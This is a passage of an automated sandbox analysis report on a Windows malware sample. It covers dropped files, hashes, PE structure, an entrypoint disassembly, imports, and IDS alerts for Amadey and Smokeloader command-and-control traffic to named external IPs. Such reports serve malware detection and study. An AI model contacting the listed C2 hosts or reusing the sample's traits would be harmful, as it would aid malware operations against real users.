Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......\|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cttgcew

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	346112
Entropy (8bit):	6.783777931421013
Encrypted:	false
SSDEEP:	3072:OJvvbtjLGg1cSgH7P7AGkZ2gdRJvh2vOfPztr+c+PEG7lOmV25lKE1miUO1a1e4Y:mtfGg0b8Gkfvh2v0BohVVPE+O1voXc
MD5:	A687E1C326C9F03569BBFEF53E21C315
SHA1:	1993746A547C67807C1118501E1A7FF9261F7C8B
SHA-256:	8C2B385622DE52145317D9E740B62EDFB74260EFAB3478810D6C87CA41183F74
SHA-512:	69C6D3A228AD0DF876CA3259A1CBD62893C48409AF271D9C4871FC8BDBB8E35ECF0C2D382086B65FC155A86D9CCD6101379A4D02D2F54545A5F746A6558D6A1C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 27%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x.1x.1x.c..1x.c..!1x.c..1x....1x.1y..1x.c..1x.c..1x.c..1x.Rich.1x.................PE..L.....a.....................D......P.......@....@...........................E.....2.......................................t/..(.....B.xE...................0E..................................... -..@............................................text...R(......................... ..`.data.....A..@......................@....rsrc...xE....B..F..................@..@.reloc..8B...0E..D..................@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\cttgcew:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\ghjhtic

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	160970
Entropy (8bit):	7.998900883724737
Encrypted:	true
SSDEEP:	3072:iFVVQpnXXKcnOEKdQWGFs+Um9HLUqgoDAQnXerfTky0f3Pi2v:zHpnBKBG6+Um9HRTnXSTVm3Pi2v
MD5:	C66EE78ED2EAEECD82D2A2BB7C48AE08
SHA1:	04AB951005835DA0DBF2A8E5E611D538621C355B
SHA-256:	16C7C2BBB880B27F2760880B05E1F62BB7267C26A12540111A56853812DC1375
SHA-512:	836F2B0C46D7F13204F4534B4BF00F98DFD82C2C5F2AE41B5F44CE93376380BC2B97B92190CB9EA41E376DDEE01D183FAAFB92E595AD842A5B44780C3515B82F
Malicious:	false
Preview:	i.<.m......qbjm.....!..\.,...E...;.`^...0..k.+%.j..Q.....Tw;..-P..!L.3...g.`Cw.q\./.. t3<T#. _a...2...Tf.V1.'......#.l[.u)'....v)....tP;.....^....g......Q....\|.....c..Q....i_KO..S{._...._..D..4nlyI.wv......V1....b.....@..1.H.%......9.&.W.g....?..6.W\..w... 1...Z.S..P.'...{.....;..F...G.5w.PZ.&A:e....Ax.....&zD...L#.....'7....$.0h.Lhc.....?...S.%....Eq)..\..bjq..'..-......Yg.. ..Lz........8P.%N.Mm-h$...l.x...d.X..GA.....;D..b.f-.n........9.8....%'...m.am^.c...Z...=g.....y4..i.,.....]i.s3'..O:......^lA....O.s.)..z.Ok....'.%...~... ....&.1..L;d..v..Yz..o.!..=,....E.zy#.V..M.t.+T...rzU{...I6..Y.1..8.X..]J8.=&<>g..M.1^:....X.............3.......j..w....A.?O..aI7E....a....%...~..3N...J....PY.....u.._...WLip,f.....d...\.B.o.39f@X!b..gc3.l.So.....R#...'.]-p.gT.m.Kz6k....R^V.!.\..a.Q..a!.:^q..P.U;Qh.....).a:....P+}.g.ng,.0......V.....5..1.Ffw;KM..j.p'k..W..vL.....b.v.u.0.a.p..H..A..j{...j.....bt..L*.d.......V.4..`.wg."e._...X.Y&CY.(..3..l%.b.8

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.783777931421013
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	q4Z52wRd28.exe
File size:	346112
MD5:	a687e1c326c9f03569bbfef53e21c315
SHA1:	1993746a547c67807c1118501e1a7ff9261f7c8b
SHA256:	8c2b385622de52145317d9e740b62edfb74260efab3478810d6c87ca41183f74
SHA512:	69c6d3a228ad0df876ca3259a1cbd62893c48409af271d9c4871fc8bdbb8e35ecf0c2d382086b65fc155a86d9ccd6101379a4d02d2f54545a5f746a6558d6a1c
SSDEEP:	3072:OJvvbtjLGg1cSgH7P7AGkZ2gdRJvh2vOfPztr+c+PEG7lOmV25lKE1miUO1a1e4Y:mtfGg0b8Gkfvh2v0BohVVPE+O1voXc
TLSH:	4D74BF10FFD8C4E6C57DC4707A25CBE86638BCA27915DA1373787A5E6FB02818E62235
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........P...1x..1x..1x..c...1x..c..!1x..c...1x......1x..1y..1x..c...1x..c...1x..c...1x.Rich.1x.................PE..L......a...........

File Icon


Icon Hash:	b4fcb6b6b69486e2

Static PE Info

General

Entrypoint:	0x40509a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x619DE380 [Wed Nov 24 07:02:24 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	063e5449636b8762744e9ce9f5564a0d

Entrypoint Preview

Instruction
call 00007F69949EA88Eh
jmp 00007F69949E5DEDh
push 00000008h
push 00412B58h
call 00007F69949E6759h
mov ecx, dword ptr [ebp+08h]
test ecx, ecx
je 00007F69949E5F9Ch
cmp dword ptr [ecx], E06D7363h
jne 00007F69949E5F94h
mov eax, dword ptr [ecx+1Ch]
test eax, eax
je 00007F69949E5F8Dh
mov eax, dword ptr [eax+04h]
test eax, eax
je 00007F69949E5F86h
and dword ptr [ebp-04h], 00000000h
push eax
push dword ptr [ecx+18h]
call 00007F69949EAA17h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F69949E6768h
ret
xor eax, eax
cmp byte ptr [ebp+0Ch], al
setne al
ret
mov esp, dword ptr [ebp-18h]
call 00007F69949EA955h
int3
call 00007F69949E6F32h
xor ecx, ecx
cmp dword ptr [eax+00000090h], ecx
setne cl
mov al, cl
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0042CF90h], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov eax, dword ptr [00414454h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
and dword ptr [ebp-00000328h], 00000000h
push ebx
push 0000004Ch
lea eax, dword ptr [ebp-00000324h]
push 00000000h
push eax
call 00007F69949EAD3Dh
lea eax, dword ptr [ebp-00000328h]
mov dword ptr [ebp-000002D8h], eax
lea eax, dword ptr [ebp-000002D0h]
add esp, 0Ch
mov dword ptr [ebp+00FFFD2Ch], eax

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x12f74	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x42e000	0x24578	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x453000	0xba8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11d0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2d20	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x184	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x12852	0x12a00	False	0.582778418624161	data	6.708277757836571	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x14000	0x4190a8	0x19000	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x42e000	0x24578	0x24600	False	0.6301613509450171	data	6.346796819372492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x453000	0x4238	0x4400	False	0.14981617647058823	data	1.7315741222067773	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AFX_DIALOG_LAYOUT	0x4501b8	0x2	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x4501a0	0x2	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x450190	0xe	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x450180	0xe	data	Setsuana	South Africa
AFX_DIALOG_LAYOUT	0x4501a8	0xe	data	Setsuana	South Africa
NAMUFILAZOXOGOJUNOCILI	0x44e160	0x1f9c	ASCII text, with very long lines (8092), with no line terminators	Setsuana	South Africa
SIYOBOVEJAH	0x44d358	0x7d1	ASCII text, with very long lines (2001), with no line terminators	Setsuana	South Africa
ZONAGOPEGOVERUXAZAVIFAZE	0x44db30	0x629	ASCII text, with very long lines (1577), with no line terminators	Setsuana	South Africa
RT_CURSOR	0x4501c0	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0	Setsuana	South Africa
RT_CURSOR	0x4504f0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Setsuana	South Africa
RT_CURSOR	0x450648	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_CURSOR	0x4514f0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_CURSOR	0x451dc0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0	Setsuana	South Africa
RT_CURSOR	0x451ef0	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0	Setsuana	South Africa
RT_ICON	0x42edd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x42fc78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x430520	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x430a88	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x433030	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x4340d8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x434a60	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x434f30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x435dd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x436680	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x438c28	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x439cd0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43a188	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x43b030	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x43b8d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x43be40	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43e3e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43f490	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x43fe18	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x4402e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Setsuana	South Africa
RT_ICON	0x441190	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Setsuana	South Africa
RT_ICON	0x441a38	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Setsuana	South Africa
RT_ICON	0x442100	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Setsuana	South Africa
RT_ICON	0x442668	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Setsuana	South Africa
RT_ICON	0x444c10	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Setsuana	South Africa
RT_ICON	0x445cb8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Setsuana	South Africa
RT_ICON	0x446640	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Setsuana	South Africa
RT_ICON	0x446b20	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x4479c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x448270	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x448938	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Setsuana	South Africa
RT_ICON	0x448ea0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44b448	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44c4f0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Setsuana	South Africa
RT_ICON	0x44ce78	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Setsuana	South Africa
RT_STRING	0x4521b8	0x3bc	data	Setsuana	South Africa
RT_ACCELERATOR	0x450100	0x40	data	Setsuana	South Africa
RT_GROUP_CURSOR	0x450620	0x22	data	Setsuana	South Africa
RT_GROUP_CURSOR	0x451d98	0x22	data	Setsuana	South Africa
RT_GROUP_CURSOR	0x451fa0	0x22	data	Setsuana	South Africa
RT_GROUP_ICON	0x434ec8	0x68	data	Setsuana	South Africa
RT_GROUP_ICON	0x43a138	0x4c	data	Setsuana	South Africa
RT_GROUP_ICON	0x440280	0x68	data	Setsuana	South Africa
RT_GROUP_ICON	0x446aa8	0x76	data	Setsuana	South Africa
RT_GROUP_ICON	0x44d2e0	0x76	data	Setsuana	South Africa
RT_VERSION	0x451fc8	0x1f0	MS Windows COFF PowerPC object file	Setsuana	South Africa
None	0x450150	0xa	data	Setsuana	South Africa
None	0x450140	0xa	data	Setsuana	South Africa
None	0x450160	0xa	data	Setsuana	South Africa
None	0x450170	0xa	data	Setsuana	South Africa

Imports

DLL

Import

KERNEL32.dll

GetComputerNameA, SetProcessAffinityMask, WriteConsoleOutputCharacterA, OpenJobObjectA, GetCommState, AddConsoleAliasW, CreateHardLinkA, GetSystemDefaultLCID, GetModuleHandleW, GetTickCount, GetConsoleAliasesA, WaitNamedPipeW, LoadLibraryW, CopyFileW, GetFileAttributesA, EnumSystemCodePagesA, GetFileAttributesW, WriteConsoleW, GetVolumePathNameA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, RemoveDirectoryA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, GetModuleHandleA, CreateMutexA, FindNextFileW, GetStringTypeW, GetFileAttributesExW, SetFileShortNameA, GetVolumeNameForVolumeMountPointW, LCMapStringW, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapAlloc, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, RtlUnwind, SetFilePointer, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, WriteFile, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, HeapReAlloc, CloseHandle, CreateFileA, SetStdHandle, LCMapStringA, MultiByteToWideChar, GetStringTypeA, GetLocaleInfoA, FlushFileBuffers, GetConsoleOutputCP, SetEndOfFile, GetProcessHeap, ReadFile

Possible Origin

Language of compilation system	Country where language is spoken	Map
Setsuana	South Africa

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3193.56.146.17449747802027700 11/19/22-16:58:50.225468	TCP	2027700	ET TROJAN Amadey CnC Check-In	49747	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449753802027700 11/19/22-16:58:52.314328	TCP	2027700	ET TROJAN Amadey CnC Check-In	49753	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449744802027700 11/19/22-16:58:49.534930	TCP	2027700	ET TROJAN Amadey CnC Check-In	49744	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449746802027700 11/19/22-16:58:49.809680	TCP	2027700	ET TROJAN Amadey CnC Check-In	49746	80	192.168.2.3	193.56.146.174
192.168.2.377.232.37.22849727802851815 11/19/22-16:58:32.473174	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49727	80	192.168.2.3	77.232.37.228
192.168.2.377.232.37.22849736802851815 11/19/22-16:58:36.653112	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49736	80	192.168.2.3	77.232.37.228
192.168.2.3193.56.146.17449752802027700 11/19/22-16:58:52.037330	TCP	2027700	ET TROJAN Amadey CnC Check-In	49752	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449748802027700 11/19/22-16:58:50.604993	TCP	2027700	ET TROJAN Amadey CnC Check-In	49748	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449751802027700 11/19/22-16:58:51.692909	TCP	2027700	ET TROJAN Amadey CnC Check-In	49751	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449749802027700 11/19/22-16:58:51.029782	TCP	2027700	ET TROJAN Amadey CnC Check-In	49749	80	192.168.2.3	193.56.146.174
192.168.2.3193.56.146.17449750802027700 11/19/22-16:58:51.366139	TCP	2027700	ET TROJAN Amadey CnC Check-In	49750	80	192.168.2.3	193.56.146.174
192.168.2.377.232.37.22849730802851815 11/19/22-16:58:34.840324	TCP	2851815	ETPRO TROJAN Sharik/Smokeloader CnC Beacon 18	49730	80	192.168.2.3	77.232.37.228
192.168.2.3193.56.146.17449745802027700 11/19/22-16:58:49.249164	TCP	2027700	ET TROJAN Amadey CnC Check-In	49745	80	192.168.2.3	193.56.146.174

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2022 16:57:08.058345079 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.058401108 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.058489084 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.059912920 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.059953928 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.140129089 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.140327930 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.146105051 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.146142006 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.146509886 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.172379017 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.172431946 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.191869020 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.192020893 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.192104101 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.192143917 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.192166090 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.192178011 CET	49697	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.192184925 CET	443	49697	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.221401930 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.221453905 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.221540928 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.221740961 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.221754074 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.286056995 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.287530899 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.287563086 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.288429022 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.288435936 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.323719025 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.323815107 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.323868036 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.325581074 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.325602055 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:08.325639963 CET	49698	443	192.168.2.3	23.35.236.109
Nov 19, 2022 16:57:08.325645924 CET	443	49698	23.35.236.109	192.168.2.3
Nov 19, 2022 16:57:21.010063887 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.010099888 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.010169983 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.013591051 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.013603926 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.101368904 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.101532936 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.102304935 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.102359056 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.141957045 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.141976118 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.142425060 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.142478943 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143492937 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143502951 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.143558979 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143570900 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.143579006 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143584967 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.143654108 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143670082 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.143686056 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143692970 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.143727064 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143753052 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143767118 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.143796921 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.298422098 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.298506021 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.298516989 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.298566103 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.317090034 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.317126989 CET	443	49699	131.253.33.200	192.168.2.3
Nov 19, 2022 16:57:21.317140102 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:21.317197084 CET	49699	443	192.168.2.3	131.253.33.200
Nov 19, 2022 16:57:45.591207027 CET	80	49683	93.184.220.29	192.168.2.3
Nov 19, 2022 16:57:45.591434002 CET	49683	80	192.168.2.3	93.184.220.29
Nov 19, 2022 16:57:49.495512009 CET	49687	443	192.168.2.3	23.35.237.194
Nov 19, 2022 16:57:49.496159077 CET	49688	80	192.168.2.3	93.184.220.29
Nov 19, 2022 16:57:49.800894022 CET	49689	443	192.168.2.3	23.50.106.206
Nov 19, 2022 16:57:49.845913887 CET	443	49689	23.50.106.206	192.168.2.3
Nov 19, 2022 16:57:49.845969915 CET	443	49689	23.50.106.206	192.168.2.3
Nov 19, 2022 16:57:49.846116066 CET	49689	443	192.168.2.3	23.50.106.206
Nov 19, 2022 16:57:49.846200943 CET	49689	443	192.168.2.3	23.50.106.206
Nov 19, 2022 16:57:50.009917021 CET	49691	80	192.168.2.3	8.241.126.249
Nov 19, 2022 16:57:50.011009932 CET	49690	443	192.168.2.3	204.79.197.200
Nov 19, 2022 16:57:50.011015892 CET	49683	80	192.168.2.3	93.184.220.29
Nov 19, 2022 16:57:50.644383907 CET	49693	80	192.168.2.3	93.184.220.29
Nov 19, 2022 16:57:50.644514084 CET	49692	80	192.168.2.3	8.248.147.254
Nov 19, 2022 16:57:50.644565105 CET	49694	80	192.168.2.3	173.222.108.226
Nov 19, 2022 16:57:50.644644976 CET	49695	80	192.168.2.3	8.248.147.254
Nov 19, 2022 16:57:50.644901037 CET	49696	80	192.168.2.3	93.184.221.240
